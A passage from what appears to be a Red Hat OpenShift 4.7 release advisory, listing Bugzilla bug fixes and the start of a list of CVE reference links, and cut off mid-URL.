Creating VM from dev perspective may fail with template not found error\n1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets\n1914212 - [e2e][automation] Add test to validate bootable disk souce\n1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes\n1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows\n1914287 - Bring back selfLink\n1914301 - User VM Template source should show the same provider as template itself\n1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs\n1914309 - /terminal page when WTO not installed shows nonsensical error\n1914334 - order of getting started samples is arbitrary\n1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel]  timeout on s390x\n1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI\n1914405 - Quick search modal should be opened when coming back from a selection\n1914407 - Its not clear that node-ca is running as non-root\n1914427 - Count of pods on the dashboard is incorrect\n1914439 - Typo in SRIOV port create command example\n1914451 - cluster-storage-operator pod running as root\n1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true\n1914642 - Customize Wizard Storage tab does not pass validation\n1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling\n1914793 - device names should not be translated\n1914894 - Warn about using non-groupified api version\n1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug\n1914932 - Put correct resource name in relatedObjects\n1914938 - PVC disk is not shown on customization wizard general tab\n1914941 - VM Template rootdisk is not deleted after fetching default disk bus\n1914975 - Collect logs from openshift-sdn namespace\n1915003 - No estimate of average node readiness during lifetime of a cluster\n1915027 - fix MCS blocking iptables rules\n1915041 - s3:ListMultipartUploadParts is relied on implicitly\n1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons\n1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours\n1915085 - Pods created and rapidly terminated get stuck\n1915114 - [aws-c2s] worker machines are not create during install\n1915133 - Missing default pinned nav items in dev perspective\n1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource\n1915187 - Remove the \"Tech preview\" tag in web-console for volumesnapshot\n1915188 - Remove HostSubnet anonymization\n1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment\n1915217 - OKD payloads expect to be signed with production keys\n1915220 - Remove dropdown workaround for user settings\n1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure\n1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod\n1915277 - [e2e][automation]fix cdi upload form test\n1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout\n1915304 - Updating scheduling component builder \u0026 base images to be consistent with ART\n1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node\n1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection\n1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod\n1915357 - Dev Catalog doesn\u0027t load anything if virtualization operator is installed\n1915379 - New template wizard should require provider and make support input a dropdown type\n1915408 - Failure in operator-registry kind e2e test\n1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation\n1915460 - Cluster name size might affect installations\n1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance\n1915540 - Silent 4.7 RHCOS install failure on ppc64le\n1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI)\n1915582 - p\u0026f: carry upstream pr 97860\n1915594 - [e2e][automation] Improve test for disk validation\n1915617 - Bump bootimage for various fixes\n1915624 - \"Please fill in the following field: Template provider\" blocks customize wizard\n1915627 - Translate Guided Tour text. \n1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error\n1915647 - Intermittent White screen when the connector dragged to revision\n1915649 - \"Template support\" pop up is not a warning; checkbox text should be rephrased\n1915654 - [e2e][automation] Add a verification for Afinity modal should hint \"Matching node found\"\n1915661 - Can\u0027t run the \u0027oc adm prune\u0027 command in a pod\n1915672 - Kuryr doesn\u0027t work with selfLink disabled. \n1915674 - Golden image PVC creation - storage size should be taken from the template\n1915685 - Message for not supported template is not clear enough\n1915760 - Need to increase timeout to wait rhel worker get ready\n1915793 - quick starts panel syncs incorrectly across browser windows\n1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster\n1915818 - vsphere-problem-detector: use \"_totals\" in metrics\n1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol\n1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version\n1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0\n1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics\n1915885 - Kuryr doesn\u0027t support workers running on multiple subnets\n1915898 - TaskRun log output shows \"undefined\" in streaming\n1915907 - test/cmd/builds.sh uses docker.io\n1915912 - sig-storage-csi-snapshotter image not available\n1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder \u0026 base images to be consistent with ART\n1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard\n1915939 - Resizing the browser window removes Web Terminal Icon\n1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance]\n1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7\n1915962 - ROKS: manifest with machine health check fails to apply in 4.7\n1915972 - Global configuration breadcrumbs do not work as expected\n1915981 - Install ethtool and conntrack in container for debugging\n1915995 - \"Edit RoleBinding Subject\" action under RoleBinding list page kebab actions causes unhandled exception\n1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups\n1916021 - OLM enters infinite loop if Pending CSV replaces itself\n1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry\n1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert\u0027s annotations\n1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk\n1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration\n1916145 - Explicitly set minimum versions of python libraries\n1916164 - Update csi-driver-nfs builder \u0026 base images to be consistent with ART\n1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7\n1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third\n1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2\n1916379 - error metrics from vsphere-problem-detector should be gauge\n1916382 - Can\u0027t create ext4 filesystems with Ignition\n1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving \u0027verified: false\u0027 even for verified updates\n1916401 - Deleting an ingress controller with a bad DNS Record hangs\n1916417 - [Kuryr] Must-gather does not have all Custom Resources information\n1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image\n1916454 - teach CCO about upgradeability from 4.6 to 4.7\n1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation\n1916502 - Boot disk mirroring fails with mdadm error\n1916524 - Two rootdisk shows on storage step\n1916580 - Default yaml is broken for VM and VM template\n1916621 - oc adm node-logs examples are wrong\n1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret. \n1916692 - Possibly fails to destroy LB and thus cluster\n1916711 - Update Kube dependencies in MCO to 1.20.0\n1916747 - remove links to quick starts if virtualization operator isn\u0027t updated to 2.6\n1916764 - editing a workload with no application applied, will auto fill the app\n1916834 - Pipeline Metrics - Text Updates\n1916843 - collect logs from openshift-sdn-controller pod\n1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed\n1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually\n1916888 - OCS wizard Donor chart does not get updated when `Device Type` is edited\n1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error \"Forbidden: cannot specify lbFloatingIP and apiFloatingIP together\"\n1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace\n1917101 - [UPI on oVirt] - \u0027RHCOS image\u0027 topic isn\u0027t located in the right place in UPI document\n1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to \u0027\"ProxyConfigController\" controller failed to sync \"key\"\u0027 error\n1917117 - Common templates - disks screen: invalid disk name\n1917124 - Custom template - clone existing PVC - the name of the target VM\u0027s data volume is hard-coded; only one VM can be created\n1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator\n1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable. \n1917148 - [oVirt] Consume 23-10 ovirt sdk\n1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened\n1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console\n1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory\n1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7\n1917327 - annotations.message maybe wrong for NTOPodsNotReady alert\n1917367 - Refactor periodic.go\n1917371 - Add docs on how to use the built-in profiler\n1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console\n1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui\n1917484 - [BM][IPI] Failed to scale down machineset\n1917522 - Deprecate --filter-by-os in oc adm catalog mirror\n1917537 - controllers continuously busy reconciling operator\n1917551 - use min_over_time for vsphere prometheus alerts\n1917585 - OLM Operator install page missing i18n\n1917587 - Manila CSI operator becomes degraded if user doesn\u0027t have permissions to list share types\n1917605 - Deleting an exgw causes pods to no longer route to other exgws\n1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API\n1917656 - Add to Project/application for eventSources from topology shows 404\n1917658 - Show TP badge for sources powered by camel connectors in create flow\n1917660 - Editing parallelism of job get error info\n1917678 - Could not provision pv when no symlink and target found on rhel worker\n1917679 - Hide double CTA in admin pipelineruns tab\n1917683 - `NodeTextFileCollectorScrapeError` alert in OCP 4.6 cluster. \n1917759 - Console operator panics after setting plugin that does not exists to the console-operator config\n1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0\n1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0\n1917799 - Gather s list of names and versions of installed OLM operators\n1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error\n1917814 - Show Broker create option in eventing under admin perspective\n1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types\n1917872 - [oVirt] rebase on latest SDK 2021-01-12\n1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image\n1917938 - upgrade version of dnsmasq package\n1917942 - Canary controller causes panic in ingress-operator\n1918019 - Undesired scrollbars in markdown area of QuickStart\n1918068 - Flaky olm integration tests\n1918085 - reversed name of job and namespace in cvo log\n1918112 - Flavor is not editable if a customize VM is created from cli\n1918129 - Update IO sample archive with missing resources \u0026 remove IP anonymization from clusteroperator resources\n1918132 - i18n: Volume Snapshot Contents menu is not translated\n1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2\n1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn\u0027t be installed on OSP\n1918153 - When `\u0026` character is set as an environment variable in a build config it is getting converted as `\\u0026`\n1918185 - Capitalization on PLR details page\n1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections\n1918318 - Kamelet connector\u0027s are not shown in eventing section under Admin perspective\n1918351 - Gather SAP configuration (SCC \u0026 ClusterRoleBinding)\n1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews\n1918395 - [ovirt] increase livenessProbe period\n1918415 - MCD nil pointer on dropins\n1918438 - [ja_JP, zh_CN] Serverless i18n misses\n1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig\n1918471 - CustomNoUpgrade Feature gates are not working correctly\n1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk\n1918622 - Updating ose-jenkins-agent-maven builder \u0026 base images to be consistent with ART\n1918623 - Updating ose-jenkins-agent-nodejs-12 builder \u0026 base images to be consistent with ART\n1918625 - Updating ose-jenkins-agent-nodejs-10 builder \u0026 base images to be consistent with ART\n1918635 - Updating openshift-jenkins-2 builder \u0026 base images to be consistent with ART #1197\n1918639 - Event listener with triggerRef crashes the console\n1918648 - Subscription page doesn\u0027t show InstallPlan correctly\n1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack\n1918748 - helmchartrepo is not http(s)_proxy-aware\n1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI\n1918803 - Need dedicated details page w/ global config breadcrumbs for \u0027KnativeServing\u0027 plugin\n1918826 - Insights popover icons are not horizontally aligned\n1918879 - need better debug for bad pull secrets\n1918958 - The default NMstate instance from the operator is incorrect\n1919097 - Close bracket \")\" missing at the end of the sentence in the UI\n1919231 - quick search modal cut off on smaller screens\n1919259 - Make \"Add x\" singular in Pipeline Builder\n1919260 - VM Template list actions should not wrap\n1919271 - NM prepender script doesn\u0027t support systemd-resolved\n1919341 - Updating ose-jenkins-agent-maven builder \u0026 base images to be consistent with ART\n1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry\n1919379 - dotnet logo out of date\n1919387 - Console login fails with no error when it can\u0027t write to localStorage\n1919396 - A11y Violation: svg-img-alt on Pod Status ring\n1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren\u0027t verified\n1919750 - Search InstallPlans got Minified React error\n1919778 - Upgrade is stuck in insights operator Degraded with \"Source clusterconfig could not be retrieved\" until insights operator pod is manually deleted\n1919823 - OCP 4.7 Internationalization Chinese tranlate issue\n1919851 - Visualization does not render when Pipeline \u0026 Task share same name\n1919862 - The tip information for `oc new-project  --skip-config-write` is wrong\n1919876 - VM created via customize wizard cannot inherit template\u0027s PVC attributes\n1919877 - Click on KSVC breaks with white screen\n1919879 - The toolbox container name is changed from \u0027toolbox-root\u0027  to \u0027toolbox-\u0027 in a chroot environment\n1919945 - user entered name value overridden by default value when selecting a git repository\n1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference\n1919970 - NTO does not update when the tuned profile is updated. \n1919999 - Bump Cluster Resource Operator Golang Versions\n1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration\n1920200 - user-settings network error results in infinite loop of requests\n1920205 - operator-registry e2e tests not working properly\n1920214 - Bump golang to 1.15 in cluster-resource-override-admission\n1920248 - re-running the pipelinerun with pipelinespec crashes the UI\n1920320 - VM template field is \"Not available\" if it\u0027s created from common template\n1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode is `Disk Mode`\n1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs\n1920390 - Monitoring \u003e Metrics graph shifts to the left when clicking the \"Stacked\" option and when toggling data series lines on / off\n1920426 - Egress Router CNI OWNERS file should have ovn-k team members\n1920427 - Need to update `oc login` help page since we don\u0027t support prompt interactively for the username\n1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time\n1920438 - openshift-tuned panics on turning debugging on/off. \n1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn\n1920481 - kuryr-cni pods using unreasonable amount of CPU\n1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof\n1920524 - Topology graph crashes adding Open Data Hub operator\n1920526 - catalog operator causing CPU spikes and bad etcd performance\n1920551 - Boot Order is not editable for Templates in \"openshift\" namespace\n1920555 - bump cluster-resource-override-admission api dependencies\n1920571 - fcp multipath will not recover failed paths automatically\n1920619 - Remove default scheduler profile value\n1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present\n1920674 - MissingKey errors in bindings namespace\n1920684 - Text in language preferences modal is misleading\n1920695 - CI is broken because of bad image registry reference in the Makefile\n1920756 - update generic-admission-server library to get the system:masters authorization optimization\n1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for \"network-check-target\" failed when \"defaultNodeSelector\" is set\n1920771 - i18n: Delete persistent volume claim drop down is not translated\n1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI\n1920912 - Unable to power off BMH from console\n1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by \"2\"\n1920984 - [e2e][automation] some menu items names are out dated\n1921013 - Gather PersistentVolume definition (if any) used in image registry config\n1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior)\n1921087 - \u0027start next quick start\u0027 link doesn\u0027t work and is unintuitive\n1921088 - test-cmd is failing on volumes.sh pretty consistently\n1921248 - Clarify the kubelet configuration cr description\n1921253 - Text filter default placeholder text not internationalized\n1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window\n1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo\n1921277 - Fix Warning and Info log statements to handle arguments\n1921281 - oc get -o yaml --export returns \"error: unknown flag: --export\"\n1921458 - [SDK] Gracefully handle the `run bundle-upgrade` if the lower version operator doesn\u0027t exist\n1921556 - [OCS with Vault]: OCS pods didn\u0027t comeup after deploying with Vault details from UI\n1921572 - For external source (i.e GitHub Source) form view as well shows yaml\n1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass\n1921610 - Pipeline metrics font size inconsistency\n1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1921655 - [OSP] Incorrect error handling during cloudinfo generation\n1921713 - [e2e][automation]  fix failing VM migration tests\n1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view\n1921774 - delete application modal errors when a resource cannot be found\n1921806 - Explore page APIResourceLinks aren\u0027t i18ned\n1921823 - CheckBoxControls not internationalized\n1921836 - AccessTableRows don\u0027t internationalize \"User\" or \"Group\"\n1921857 - Test flake when hitting router in e2e tests due to one router not being up to date\n1921880 - Dynamic plugins are not initialized on console load in production mode\n1921911 - Installer PR #4589 is causing leak of IAM role policy bindings\n1921921 - \"Global Configuration\" breadcrumb does not use sentence case\n1921949 - Console bug - source code URL broken for gitlab self-hosted repositories\n1921954 - Subscription-related constraints in ResolutionFailed events are misleading\n1922015 - buttons in modal header are invisible on Safari\n1922021 - Nodes terminal page \u0027Expand\u0027 \u0027Collapse\u0027 button not translated\n1922050 - [e2e][automation] Improve vm clone tests\n1922066 - Cannot create VM from custom template which has extra disk\n1922098 - Namespace selection dialog is not closed after select a namespace\n1922099 - Updated Readme documentation for QE code review and setup\n1922146 - Egress Router CNI doesn\u0027t have logging support. \n1922267 - Collect specific ADFS error\n1922292 - Bump RHCOS boot images for 4.7\n1922454 - CRI-O doesn\u0027t enable pprof by default\n1922473 - reconcile LSO images for 4.8\n1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace\n1922782 - Source registry missing docker:// in yaml\n1922907 - Interop UI Tests - step implementation for updating feature files\n1922911 - Page crash when click the \"Stacked\" checkbox after clicking the data series toggle buttons\n1922991 - \"verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build\" test fails on OKD\n1923003 - WebConsole Insights widget showing \"Issues pending\" when the cluster doesn\u0027t report anything\n1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources\n1923102 - [vsphere-problem-detector-operator] pod\u0027s version is not correct\n1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot\n1923674 - k8s 1.20 vendor dependencies\n1923721 - PipelineRun running status icon is not rotating\n1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios\n1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator\n1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator\n1923874 - Unable to specify values with % in kubeletconfig\n1923888 - Fixes error metadata gathering\n1923892 - Update arch.md after refactor. \n1923894 - \"installed\" operator status in operatorhub page does not reflect the real status of operator\n1923895 - Changelog generation. \n1923911 - [e2e][automation] Improve tests for vm details page and list filter\n1923945 - PVC Name and Namespace resets when user changes os/flavor/workload\n1923951 - EventSources shows `undefined` in project\n1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins\n1924046 - Localhost: Refreshing on a Project removes it from nav item urls\n1924078 - Topology quick search View all results footer should be sticky. \n1924081 - NTO should ship the latest Tuned daemon release 2.15\n1924084 - backend tests incorrectly hard-code artifacts dir\n1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents  do not have unexpected content using a simple Docker Strategy Build\n1924135 - Under sufficient load, CRI-O may segfault\n1924143 - Code Editor Decorator url is broken for Bitbucket repos\n1924188 - Language selector dropdown doesn\u0027t always pre-select the language\n1924365 - Add extra disk for VM which use boot source PXE\n1924383 - Degraded network operator during upgrade to 4.7.z\n1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box. \n1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can\u0027t set finalizers on\n1924583 - Deprectaed templates are listed in the Templates screen\n1924870 - pick upstream pr#96901: plumb context with request deadline\n1924955 - Images from Private external registry not working in deploy Image\n1924961 - k8sutil.TrimDNS1123Label creates invalid values\n1924985 - Build egress-router-cni for both RHEL 7 and 8\n1925020 - Console demo plugin deployment image shoult not point to dockerhub\n1925024 - Remove extra validations on kafka source form view net section\n1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running\n1925072 - NTO needs to ship the current latest stalld v1.7.0\n1925163 - Missing info about dev catalog in boot source template column\n1925200 - Monitoring Alert icon is missing on the workload in Topology view\n1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1\n1925319 - bash syntax error in configure-ovs.sh script\n1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data\n1925516 - Pipeline Metrics Tooltips are overlapping data\n1925562 - Add new ArgoCD link from GitOps application environments page\n1925596 - Gitops details page image and commit id text overflows past card boundary\n1926556 - \u0027excessive etcd leader changes\u0027 test case failing in serial job because prometheus data is wiped by machine set test\n1926588 - The tarball of operator-sdk is not ready for ocp4.7\n1927456 - 4.7 still points to 4.6 catalog images\n1927500 - API server exits non-zero on 2 SIGTERM signals\n1929278 - Monitoring workloads using too high a priorityclass\n1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api\n1929920 - Cluster monitoring documentation link is broken - 404 not found\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-10103\nhttps://access.redhat.com/security/cve/CVE-2018-10105\nhttps://access.redhat.com/security/cve/CVE-2018-14461\nhttps://access.redhat.com/security/cve/CVE-2018-14462\nhttps://access.redhat.com/security/cve/CVE-2018-14463\nhttps://access.redhat.com/security/cve/CVE-2018-14464\nhttps://access.redhat.com/security/cve/CVE-2018-14465\nhttps://access.redhat.com/security/cve/CVE-2018-14466\nhttps://access.redhat.com/security/cve/CVE-2018-14467\nhttps://access.redhat.com/security/cve/CVE-2018-14468\nhttps://access.redhat.com/security/cve/CVE-2018-14469\nhttps://access.redhat.com/security/cve/CVE-2018-14470\nhttps://access.redhat.com/security/cve/CVE-2018-14553\nhttps://access.redhat.com/security/cve/CVE-2018-14879\nhttps://access.redhat.com/security/cve/CVE-2018-14880\nhttps://access.redhat.com/security/cve/CVE-2018-14881\nhttps://access.redhat.com/security/cve/CVE-2018-14882\nhttps://access.redhat.com/security/cve/CVE-2018-16227\nhttps://access.redhat.com/security/cve/CVE-2018-16228\nhttps://access.redhat.com/security/cve/CVE-2018-16229\nhttps://access.redhat.com/security/cve/CVE-2018-16230\nhttps://access.redhat.com/security/cve/CVE-2018-16300\nhttps://access.redhat.com/security/cve/CVE-2018-16451\nhttps://access.redhat.com/security/cve/CVE-2018-16452\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2019-3884\nhttps://access.redhat.com/security/cve/CVE-2019-5018\nhttps://access.redhat.com/security/cve/CVE-2019-6977\nhttps://access.redhat.com/security/cve/CVE-2019-6978\nhttps://access.redhat.com/security/cve/CVE-2019-8625\nhttps://access.redhat.com/security/cve/CVE-2019-8710\nhttps://access.redhat.com/security/cve/CVE-2019-8720\nhttps://access.redhat.com/security/cve/CVE-2019-8743\nhttps://access.redhat.com/security/cve/CVE-2019-8764\nhttps://access.redhat.com/security/cve/CVE-2019-8766\nhttps://access.redhat.com/security/cve/CVE-2019-8769\nhttps://access.redhat.com/security/cve/CVE-2019-8771\nhttps://access.redhat.com/security/cve/CVE-2019-8782\nhttps://access.redhat.com/security/cve/CVE-2019-8783\nhttps://access.redhat.com/security/cve/CVE-2019-8808\nhttps://access.redhat.com/security/cve/CVE-2019-8811\nhttps://access.redhat.com/security/cve/CVE-2019-8812\nhttps://access.redhat.com/security/cve/CVE-2019-8813\nhttps://access.redhat.com/security/cve/CVE-2019-8814\nhttps://access.redhat.com/security/cve/CVE-2019-8815\nhttps://access.redhat.com/security/cve/CVE-2019-8816\nhttps://access.redhat.com/security/cve/CVE-2019-8819\nhttps://access.redhat.com/security/cve/CVE-2019-8820\nhttps://access.redhat.com/security/cve/CVE-2019-8823\nhttps://access.redhat.com/security/cve/CVE-2019-8835\nhttps://access.redhat.com/security/cve/CVE-2019-8844\nhttps://access.redhat.com/security/cve/CVE-2019-8846\nhttps://access.redhat.com/security/cve/CVE-2019-9455\nhttps://access.redhat.com/security/cve/CVE-2019-9458\nhttps://access.redhat.com/security/cve/CVE-2019-11068\nhttps://access.redhat.com/security/cve/CVE-2019-12614\nhttps://access.redhat.com/security/cve/CVE-2019-13050\nhttps://access.redhat.com/security/cve/CVE-2019-13225\nhttps://access.redhat.com/security/cve/CVE-2019-13627\nhttps://access.redhat.com/security/cve/CVE-2019-14889\nhttps://access.redhat.com/security/cve/CVE-2019-15165\nhttps://access.redhat.com/security/cve/CVE-2019-15166\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-15917\nhttps://access.redhat.com/security/cve/CVE-2019-15925\nhttps://access.redhat.com/security/cve/CVE-2019-16167\nhttps://access.redhat.com/security/cve/CVE-2019-16168\nhttps://access.redhat.com/security/cve/CVE-2019-16231\nhttps://access.redhat.com/security/cve/CVE-2019-16233\nhttps://access.redhat.com/security/cve/CVE-2019-16935\nhttps://access.redhat.com/security/cve/CVE-2019-17450\nhttps://access.redhat.com/security/cve/CVE-2019-17546\nhttps://access.redhat.com/security/cve/CVE-2019-18197\nhttps://access.redhat.com/security/cve/CVE-2019-18808\nhttps://access.redhat.com/security/cve/CVE-2019-18809\nhttps://access.redhat.com/security/cve/CVE-2019-19046\nhttps://access.redhat.com/security/cve/CVE-2019-19056\nhttps://access.redhat.com/security/cve/CVE-2019-19062\nhttps://access.redhat.com/security/cve/CVE-2019-19063\nhttps://access.redhat.com/security/cve/CVE-2019-19068\nhttps://access.redhat.com/security/cve/CVE-2019-19072\nhttps://access.redhat.com/security/cve/CVE-2019-19221\nhttps://access.redhat.com/security/cve/CVE-2019-19319\nhttps://access.redhat.com/security/cve/CVE-2019-19332\nhttps://access.redhat.com/security/cve/CVE-2019-19447\nhttps://access.redhat.com/security/cve/CVE-2019-19524\nhttps://access.redhat.com/security/cve/CVE-2019-19533\nhttps://access.redhat.com/security/cve/CVE-2019-19537\nhttps://access.redhat.com/security/cve/CVE-2019-19543\nhttps://access.redhat.com/security/cve/CVE-2019-19602\nhttps://access.redhat.com/security/cve/CVE-2019-19767\nhttps://access.redhat.com/security/cve/CVE-2019-19770\nhttps://access.redhat.com/security/cve/CVE-2019-19906\nhttps://access.redhat.com/security/cve/CVE-2019-19956\nhttps://access.redhat.com/security/cve/CVE-2019-20054\nhttps://access.redhat.com/security/cve/CVE-2019-20218\nhttps://access.redhat.com/security/cve/CVE-2019-20386\nhttps://access.redhat.com/security/cve/CVE-2019-20387\nhttps://access.redhat.com/security/cve/CVE-2019-20388\nhttps://access.redhat.com/security/cve/CVE-2019-20454\nhttps://access.redhat.com/security/cve/CVE-2019-20636\nhttps://access.redhat.com/security/cve/CVE-2019-20807\nhttps://access.redhat.com/security/cve/CVE-2019-20812\nhttps://access.redhat.com/security/cve/CVE-2019-20907\nhttps://access.redhat.com/security/cve/CVE-2019-20916\nhttps://access.redhat.com/security/cve/CVE-2020-0305\nhttps://access.redhat.com/security/cve/CVE-2020-0444\nhttps://access.redhat.com/security/cve/CVE-2020-1716\nhttps://access.redhat.com/security/cve/CVE-2020-1730\nhttps://access.redhat.com/security/cve/CVE-2020-1751\nhttps://access.redhat.com/security/cve/CVE-2020-1752\nhttps://access.redhat.com/security/cve/CVE-2020-1971\nhttps://access.redhat.com/security/cve/CVE-2020-2574\nhttps://access.redhat.com/security/cve/CVE-2020-2752\nhttps://access.redhat.com/security/cve/CVE-2020-2922\nhttps://access.redhat.com/security/cve/CVE-2020-3862\nhttps://access.redhat.com/security/cve/CVE-2020-3864\nhttps://access.redhat.com/security/cve/CVE-2020-3865\nhttps://access.redhat.com/security/cve/CVE-2020-3867\nhttps://access.redhat.com/security/cve/CVE-2020-3868\nhttps://access.redhat.com/security/cve/CVE-2020-3885\nhttps://access.redhat.com/security/cve/CVE-2020-3894\nhttps://access.redhat.com/security/cve/CVE-2020-3895\nhttps://access.redhat.com/security/cve/CVE-2020-3897\nhttps://access.redhat.com/security/cve/CVE-2020-3898\nhttps://access.redhat.com/security/cve/CVE-2020-3899\nhttps://access.redhat.com/security/cve/CVE-2020-3900\nhttps://access.redhat.com/security/cve/CVE-2020-3901\nhttps://access.redhat.com/security/cve/CVE-2020-3902\nhttps://access.redhat.com/security/cve/CVE-2020-6405\nhttps://access.redhat.com/security/cve/CVE-2020-7595\nhttps://access.redhat.com/security/cve/CVE-2020-7774\nhttps://access.redhat.com/security/cve/CVE-2020-8177\nhttps://access.redhat.com/security/cve/CVE-2020-8492\nhttps://access.redhat.com/security/cve/CVE-2020-8